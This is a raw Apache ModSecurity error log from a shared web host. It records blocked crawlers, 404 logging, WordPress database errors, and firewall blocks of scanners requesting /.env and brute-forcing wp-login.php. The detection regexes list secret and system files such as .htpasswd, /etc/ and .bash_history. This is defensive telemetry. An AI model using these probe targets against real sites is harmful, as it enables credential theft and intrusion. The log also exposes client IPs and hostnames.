[Tue May 26 16:48:19.721337 2026] [security2:error] [pid 817651:tid 817908] [client 114.119.150.166:61513] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/beta/index.php"] [unique_id "ahWBe9lGRCPPN1dS2y258gAAAQQ"], referer: http://glorodavionics.com/beta/index.php?route=account/voucher
[Tue May 26 16:48:20.204880 2026] [security2:error] [pid 817651:tid 817866] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBetlGRCPPN1dS2y255QAAANo"]
[Tue May 26 16:48:20.736350 2026] [security2:error] [pid 823496:tid 823740] [client 176.65.139.238:56304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "composer.dezka.mx"] [uri "/.env"] [unique_id "ahWBfJa08mrtyBNpA4PaGgAAAHA"]
[Tue May 26 16:48:22.599392 2026] [security2:error] [pid 823496:tid 823735] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBe5a08mrtyBNpA4PaDAAAAGs"]
[Tue May 26 16:48:24.134665 2026] [security2:error] [pid 823496:tid 823715] [client 176.65.139.236:34436] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "ramaenterprises.onesoft.in"] [uri "/.env"] [unique_id "ahWBgJa08mrtyBNpA4PaSAAAAFc"]
[Tue May 26 16:48:24.334178 2026] [security2:error] [pid 823496:tid 823708] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBfpa08mrtyBNpA4PaLwAAAFA"]
[Tue May 26 16:48:24.564510 2026] [security2:error] [pid 823496:tid 823724] [client 176.65.139.229:18222] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "srworldwide.in.onesoft.in"] [uri "/.env"] [unique_id "ahWBgJa08mrtyBNpA4PaTAAAAGA"]
[Tue May 26 16:48:25.856723 2026] [security2:error] [pid 817651:tid 817856] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBgNlGRCPPN1dS2y26DQAAANA"]
[Tue May 26 16:48:26.370755 2026] [core:error] [pid 817651:tid 817800] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:48:26.370771 2026] [core:error] [pid 817651:tid 817800] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:48:26.656423 2026] [security2:error] [pid 817651:tid 817798] [client 20.17.176.186:53140] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.paqys.com"] [uri "/index.php"] [unique_id "ahWBgtlGRCPPN1dS2y26GgAAAJY"], referer: binance.com
[Tue May 26 16:48:27.394296 2026] [security2:error] [pid 817651:tid 817852] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBgdlGRCPPN1dS2y26FwAAAMw"]
[Tue May 26 16:48:27.535639 2026] [security2:error] [pid 823496:tid 823637] [client 176.65.139.235:27460] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "holix.ktmadvance-senegal.com"] [uri "/.env"] [unique_id "ahWBg5a08mrtyBNpA4PafQAAAAk"]
[Tue May 26 16:48:27.540305 2026] [security2:error] [pid 817651:tid 817850] [client 176.65.139.239:52834] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "encaf.ktmadvance-senegal.com"] [uri "/.env"] [unique_id "ahWBg9lGRCPPN1dS2y26LgAAAMo"]
[Tue May 26 16:48:27.574666 2026] [security2:error] [pid 823496:tid 823715] [client 176.65.139.233:19200] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "test.ktmadvance-senegal.com"] [uri "/.env"] [unique_id "ahWBg5a08mrtyBNpA4PafgAAAFc"]
[Tue May 26 16:48:27.578627 2026] [lsapi:warn] [pid 823496:tid 823735] [client 45.13.225.123:55106] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Incorrect key file for table './srsglzts_wp57454/wp4i_options.MYI'; try to repair it for query SELECT option_name, option_value FROM wp4i_options WHERE option_name IN ('_transient_timeout_jetpack_autoloader_plugin_paths') made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, Automattic\\Jetpack\\Autoloader\\jp12ea33bcea6a641c43d24712adc9f0b6\\Shutdown_Handler->__invoke, Automattic\\Jetpack\\Autoloader\\jp12ea33bcea6a641c43d24712adc9f0b6\\Plugins_Handler->cache_plugins, set_transient, wp_prime_option_caches\n
[Tue May 26 16:48:28.285191 2026] [security2:error] [pid 823496:tid 823714] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWBhJa08mrtyBNpA4PaiQAAAFY"], referer: https://www.anujtradingco.com/
[Tue May 26 16:48:28.924319 2026] [security2:error] [pid 823496:tid 823671] [client 117.198.37.168:50088] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWBhJa08mrtyBNpA4PakAAAACs"]
[Tue May 26 16:48:28.924467 2026] [security2:error] [pid 823496:tid 823671] [client 117.198.37.168:50088] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWBhJa08mrtyBNpA4PakAAAACs"]
[Tue May 26 16:48:29.068185 2026] [security2:error] [pid 823496:tid 823632] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBg5a08mrtyBNpA4PaewAAAAQ"]
[Tue May 26 16:48:29.175743 2026] [security2:error] [pid 823496:tid 823706] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWBhZa08mrtyBNpA4PamAAAAE4"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1443956&moderation-hash=9164ad00ee6584c7e227ef699a9953b1
[Tue May 26 16:48:29.470544 2026] [lsapi:warn] [pid 817651:tid 817877] [client 45.13.225.123:48292] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_timeout_woocommerce_blocks_asset_api_script_data', '1782386309', 'off') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, Automattic\\WooCommerce\\Blocks\\Assets\\Api->update_script_data_cache, set_transient, add_option\n
[Tue May 26 16:48:29.472082 2026] [lsapi:warn] [pid 817651:tid 817877] [client 45.13.225.123:48292] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_woocommerce_blocks_asset_api_script_data', '{\\"script_data\\":{\\"assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\":{\\"src\\":\\"http:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\",\\"version\\":\\"07c2f0675ddd247d2325\\",\\"dependencies\\":[\\"wp-hooks\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-types.js\\":{\\"src\\":\\"http:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-types.js\\",\\"version\\":\\"bda84b1be3361607d04a\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\":{\\"src\\":\\"http:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\",\\"version\\":\\"ca04183222edaf8a26be\\",\\"dependencies\\":[\\"wp-api-fetch\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\":{\\"src\\":\\"http:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\",\\"version\\":\\"3b21c127321dcdffaeba\\",\\"dependencies\\":[\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-api-fetch\\",\\"wp-data\\",\\"wp-data-controls\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-notices\\",\\"wp-polyfill\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\":{\\"src\\":\\"http:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\",\\"version\\":\\"389607d443f2591c0913\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\":{\\"src\\":\\"http:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\",\\"version\\":\\"1c879273bd5c193cad0a\\",\\"dependencies\\":[\\"react\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\":{\\"src\\":\\"http:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\",\\"version\\":\\"00ce86264fca4977b16a\\",\\"dependencies\\":[\\"react\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-dom-ready\\",\\"wp-element\\",\\"wp-hooks\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\":{\\"src\\":\\"http:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\",\\"version\\":\\"6eb6865831aa5a75475d\\",\\"dependencies\\":[\\"react\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\":{\\"src\\":\\"http:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\",\\"version\\":\\"4f21a9f43ea5bfa7f02e\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-data-store\\",\\"wc-blocks-shared-context\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/price-format.js\\":{\\"src\\":\\"http:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/price-format.js\\",\\"version\\":\\"eb7a7398126f71912b09\\",\\"dependencies\\":[\\"wc-settings\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\":{\\"src\\":\\"http:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\",\\"version\\":\\"cbe41c7abb3949767748\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\":{\\"src\\":\\"http:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\",\\"version\\":\\"5980872eb77817dd6b18\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-warning\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\":{\\"src\\":\\"http:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\",\\"version\\":\\"211abb6906805368a551\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-data-store\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\":{\\"src\\":\\"http:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\",\\"version\\":\\"8997b5406dcf18064a4e\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\":{\\"src\\":\\"http:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\",\\"version\\":\\"c33101c7e57ca780e0d8\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters.js\\":{\\"src\\":\\"http:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters.js\\",\\"version\\":\\"07254c2f32c26d21c0ef\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\":{\\"src\\":\\"http:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\",\\"version\\":\\"b7ae146ebe7863f9f6b8\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products.js\\":{\\"src\\":\\"http:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/all-products.js\\",\\"version\\":\\"de63136b925fe4405f95\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-blocks-shared-context\\",\\"wc-blocks-shared-hocs\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-api-fetch\\",\\"wp-autop\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-escape-html\\",\\"wp-hooks\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-style-engine\\",\\"wp-url\\",\\"wp-wordcount\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products-frontend.js\\":{\\"src\\":\\"http:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\
[Tue May 26 16:48:30.251031 2026] [security2:error] [pid 823496:tid 823690] [client 14.185.221.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBhJa08mrtyBNpA4PaiwAAAD4"]
[Tue May 26 16:48:31.305590 2026] [security2:error] [pid 823496:tid 823639] [client 114.119.149.90:28331] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "operatives.org.in"] [uri "/operatives-regalia.htm"] [unique_id "ahWBh5a08mrtyBNpA4PatQAAAAs"], referer: http://operatives.org.in/operatives-regalia.htm
[Tue May 26 16:48:31.467635 2026] [security2:error] [pid 817651:tid 817817] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBhdlGRCPPN1dS2y26OQAAAKk"]
[Tue May 26 16:48:32.541269 2026] [security2:error] [pid 823496:tid 823691] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBh5a08mrtyBNpA4PatAAAAD8"]
[Tue May 26 16:48:32.700143 2026] [autoindex:error] [pid 823496:tid 823701] [client 20.17.176.186:57696] AH01276: Cannot serve directory /home2/paqys91a/public_html/.well-known/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 16:48:33.979094 2026] [core:error] [pid 823496:tid 823664] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:48:33.979148 2026] [core:error] [pid 823496:tid 823664] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:48:34.886465 2026] [security2:error] [pid 817651:tid 817749] [remote 209.42.18.223:49104] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.18.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahWBitlGRCPPN1dS2y26VwAA1mE"]
[Tue May 26 16:48:35.024723 2026] [security2:error] [pid 823496:tid 823638] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBiZa08mrtyBNpA4Pa4QAAAAo"]
[Tue May 26 16:48:36.178241 2026] [core:error] [pid 823496:tid 823745] [client 5.255.99.53:53692] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:48:36.178272 2026] [core:error] [pid 823496:tid 823745] [client 5.255.99.53:53692] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:48:36.225758 2026] [security2:error] [pid 817651:tid 817908] [client 45.13.225.123:36148] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "armourin.srsglobalsoft.com"] [uri "/.env"] [unique_id "ahWBjNlGRCPPN1dS2y26ZAAAAQQ"]
[Tue May 26 16:48:36.657119 2026] [security2:error] [pid 823496:tid 823726] [client 62.60.130.233:56300] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "abrindoempresa.contabilidadecarioca.com.br"] [uri "/wp-login.php"] [unique_id "ahWBjJa08mrtyBNpA4PbDQAAAGI"]
[Tue May 26 16:48:37.011003 2026] [security2:error] [pid 817651:tid 817805] [client 62.60.130.233:56431] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "abrindoempresa.contabilidadecarioca.com.br"] [uri "/wp-login.php"] [unique_id "ahWBjdlGRCPPN1dS2y26dgAAAJ0"], referer: https://twitter.com/
[Tue May 26 16:48:37.213029 2026] [security2:error] [pid 823496:tid 823676] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBi5a08mrtyBNpA4Pa_AAAADA"]
[Tue May 26 16:48:37.505714 2026] [security2:error] [pid 817651:tid 817795] [client 40.77.167.138:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.nicmaperu.com"] [uri "/index.php"] [unique_id "ahWBjdlGRCPPN1dS2y26fQAAAJM"]
